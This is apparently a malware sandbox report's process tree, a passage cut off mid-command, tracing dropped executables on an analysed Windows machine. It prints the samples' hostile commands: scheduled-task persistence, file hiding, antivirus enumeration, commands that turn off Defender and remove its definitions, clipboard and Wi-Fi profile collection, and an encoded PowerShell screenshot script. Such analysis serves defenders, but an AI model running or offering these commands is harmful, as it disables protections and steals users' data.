C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1724,i,6816528115738189755,5836905865396253367,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=2472 /prefetch:35⤵PID:6616
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2004,i,6816528115738189755,5836905865396253367,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=2584 /prefetch:85⤵PID:6484
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3132,i,6816528115738189755,5836905865396253367,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=3144 /prefetch:15⤵
- Uses browser remote debugging
PID:5260
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,6816528115738189755,5836905865396253367,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=3212 /prefetch:15⤵
- Uses browser remote debugging
PID:6300
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4540,i,6816528115738189755,5836905865396253367,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=4576 /prefetch:15⤵
- Uses browser remote debugging
PID:3548
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4180,i,6816528115738189755,5836905865396253367,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=4200 /prefetch:85⤵PID:7284
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4272,i,6816528115738189755,5836905865396253367,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=4760 /prefetch:85⤵PID:4784
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4980,i,6816528115738189755,5836905865396253367,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5040 /prefetch:85⤵PID:6776
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
PID:6756 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff069846f8,0x7fff06984708,0x7fff069847185⤵PID:6840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1332,10215381313691545971,17562917557669633597,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 /prefetch:35⤵PID:5960
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
PID:4932 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff069846f8,0x7fff06984708,0x7fff069847185⤵PID:7692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,2253479109485029097,18114882156339697427,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:25⤵PID:2992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,2253479109485029097,18114882156339697427,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:35⤵PID:7932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,2253479109485029097,18114882156339697427,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:85⤵PID:4588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2120,2253479109485029097,18114882156339697427,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:15⤵
- Uses browser remote debugging
PID:7000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2120,2253479109485029097,18114882156339697427,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:15⤵
- Uses browser remote debugging
PID:6948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2120,2253479109485029097,18114882156339697427,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4280 /prefetch:15⤵
- Uses browser remote debugging
PID:6760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2120,2253479109485029097,18114882156339697427,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:15⤵
- Uses browser remote debugging
PID:6244
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\CPDB.exe"C:\Users\Admin\AppData\Local\Temp\a\CPDB.exe"3⤵PID:6784
-
-
C:\Users\Admin\AppData\Local\Temp\a\Server.exe"C:\Users\Admin\AppData\Local\Temp\a\Server.exe"3⤵PID:7716
-
-
C:\Users\Admin\AppData\Local\Temp\a\discord.exe"C:\Users\Admin\AppData\Local\Temp\a\discord.exe"3⤵PID:6096
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "IMAP Monitor" /xml "C:\Users\Admin\AppData\Local\Temp\tmpCD1F.tmp"4⤵
- Scheduled Task/Job: Scheduled Task
PID:1548
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "IMAP Monitor Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpDD4C.tmp"4⤵
- Scheduled Task/Job: Scheduled Task
PID:6772
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\winX32.exe"C:\Users\Admin\AppData\Local\Temp\a\winX32.exe"3⤵PID:8036
-
C:\Users\Admin\AppData\Roaming\winX32.exe"C:\Users\Admin\AppData\Roaming\winX32.exe"4⤵PID:6472
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h +r +s "C:\Users\Admin\AppData\Roaming\winX32.exe"4⤵
- Views/modifies file attributes
PID:7116
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Discord2.exe"C:\Users\Admin\AppData\Local\Temp\a\Discord2.exe"3⤵PID:2220
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"' & exit4⤵PID:5740
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
PID:4752
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9E9.tmp.bat""4⤵PID:6608
-
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:6656
-
-
C:\Users\Admin\AppData\Roaming\Discord.exe"C:\Users\Admin\AppData\Roaming\Discord.exe"5⤵PID:6864
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\File.exe"C:\Users\Admin\AppData\Local\Temp\a\File.exe"3⤵PID:7040
-
-
C:\Users\Admin\AppData\Local\Temp\a\nvc.exe"C:\Users\Admin\AppData\Local\Temp\a\nvc.exe"3⤵PID:2740
-
-
C:\Users\Admin\AppData\Local\Temp\a\zx.exe"C:\Users\Admin\AppData\Local\Temp\a\zx.exe"3⤵PID:1620
-
C:\Users\Admin\AppData\Local\Temp\a\zx.exe"C:\Users\Admin\AppData\Local\Temp\a\zx.exe"4⤵PID:2828
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ScreenSync.exe"C:\Users\Admin\AppData\Local\Temp\a\ScreenSync.exe"3⤵PID:7068
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7068 -s 13924⤵
- Program crash
PID:4428
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\InstallSetup.exe"C:\Users\Admin\AppData\Local\Temp\a\InstallSetup.exe"3⤵PID:6176
-
C:\Users\Admin\AppData\Local\Temp\4D8A.tmp.exe"C:\Users\Admin\AppData\Local\Temp\4D8A.tmp.exe"4⤵PID:1180
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 14285⤵
- Program crash
PID:1924
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Lead_dumper.exe"C:\Users\Admin\AppData\Local\Temp\a\Lead_dumper.exe"3⤵PID:2604
-
-
C:\Users\Admin\AppData\Local\Temp\a\msword.exe"C:\Users\Admin\AppData\Local\Temp\a\msword.exe"3⤵PID:7868
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c move Hospital Hospital.cmd & Hospital.cmd4⤵PID:5964
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:3496
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵PID:7604
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:7960
-
-
C:\Windows\SysWOW64\findstr.exefindstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"5⤵PID:6456
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 821215⤵PID:3008
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Sd5⤵PID:7660
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "EXPECTED" Pays5⤵PID:9240
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 82121\Qui.com + Notre + Sheer + Danny + Testament + Prompt + Knee + Sucks + Hindu + Emperor + Pay + Higher + Runtime 82121\Qui.com5⤵PID:3452
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Revision + ..\Ii + ..\Participants V5⤵PID:5436
-
-
C:\Users\Admin\AppData\Local\Temp\82121\Qui.comQui.com V5⤵PID:9588
-
C:\Users\Admin\AppData\Local\Temp\82121\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\82121\RegAsm.exe6⤵PID:5932
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:4872
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Built.exe"C:\Users\Admin\AppData\Local\Temp\a\Built.exe"3⤵PID:6332
-
C:\Users\Admin\AppData\Local\Temp\a\Built.exe"C:\Users\Admin\AppData\Local\Temp\a\Built.exe"4⤵PID:2344
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Built.exe'"5⤵PID:5652
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Built.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:8164
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"5⤵PID:4536
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend6⤵
- Command and Scripting Interpreter: PowerShell
PID:6344
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:7468
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:3376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:2892
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:3312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"5⤵PID:5908
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName6⤵PID:6992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"5⤵
- Clipboard Data
PID:3452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard6⤵
- Clipboard Data
PID:4076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:1576
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:5216
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:8108
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:4136
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"5⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3108 -
C:\Windows\system32\netsh.exenetsh wlan show profile6⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:7204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"5⤵PID:3940
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
PID:7392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="5⤵PID:5424
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIA